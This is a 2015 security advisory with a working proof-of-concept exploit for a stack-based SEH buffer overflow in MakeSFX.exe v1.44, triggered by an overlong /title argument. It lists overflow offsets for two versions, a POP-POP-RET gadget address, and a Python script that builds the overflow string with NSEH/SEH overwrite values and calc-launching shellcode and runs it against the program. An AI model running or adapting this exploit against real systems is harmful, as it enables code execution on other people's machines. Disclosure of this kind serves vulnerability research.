MakeSFX.exe 1.44 - Stack Buffer Overflow

2015-09-30 20:05:06

'''
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-MAKESFX-BUFF-OVERFLOW-09302015.txt



Vendor:
================================
freeextractor.sourceforge.net/FreeExtractor
freeextractor.sourceforge.net/FreeExtractor/MakeSFX.exe


Vulnerable Product:
==================================================
MakeSFX.exe v1.44
Mar 19 2001 & Dec 10 2009 versions



Vulnerability Type:
============================
Stack Based Buffer Overflow



CVE Reference:
==============
N/A



Vulnerability Details:
=========================
Converts a zip file into a 32-bit GUI Windows self-extractor.

Example usage:

makesfx.exe /zip="source.zip" /sfx="output.exe" [/title="Your Title"]
[/website="http://www.example.com"] [/intro="This is a test self extractor"]
[/defaultpath="$desktop$\My Files"] [/autoextract] [/openexplorerwindow]
[/shortcut="$desktop$\Program Shortcut.lnk|$targetdir$\Program.exe]
[/delete] [/icon="MyIcon.ico"] [/overwrite] [/?]

etc...

The '/title' argument when supplied an overly long payload will overwrite
NSEH & SEH exception handlers
causing buffer overflow, we can then execute our aribitrary shellcode. I
have seen some applications using
MakeSFX.exe from .bat files for some automation purposes, if the local .bat
file is replaced by malicious
one attackers can cause mayhem on the system.

Both versions from 2001 & 2009 are vulnerable but exploit setup will be off
by 20 bytes.
punksnotdead="A"*1078+"RRRR"+"BBBB" #<---- SEH Handler control MakeSFX
v1.44 (Dec 10 2009)
punksnotdead="A"*1158+"RRRR"+"BBBB" #<---- SEH Handler control MakeSFX
v1.44 (Mar 19 2001)


POC exploit code(s):
====================

We will exploit MakeSFX v1.44 (Mar 19 2001).

I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH,
Rebase all set to False, but it contains null 0x00.
So no suitable SEH instruction address avail, I will instead have to use
mona.py to look for POP,POP,RET instruction
in outside modules and we find some...

e.g.

0x77319529 : pop esi # pop edi # ret | {PAGE_READONLY}


Python script to exploitz!
==========================
'''

import struct,os,subprocess

#MakeSFX v1.44 (Mar 19 2001)
pgm="C:\\hyp3rlinx\\MakeSFX.exe "

#shellcode to pop calc.exe
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

#punksnotdead="A"*1158+"RRRR"+"BBBB" #<--- KABOOOOOOM!

nseh="\xEB\x06"+"\x90"*2
seh=struct.pack('<L', 0x76F29529)

punksnotdead="/title"+"A"*1158 + nseh + seh + sc + "\x90"*10
subprocess.Popen([pgm, punksnotdead], shell=False)


'''
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 30, 2015 : Public Disclosure



Exploitation Technique:
=======================
Local
Tested successfully on Windows SP1
DisableExceptionChainValidation in registry set to '1'
value of 1 disables the registry entry that prevents SEH overwrites.


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
'''

Fixes

No fixes

In order to submit a new fix you need to be registered.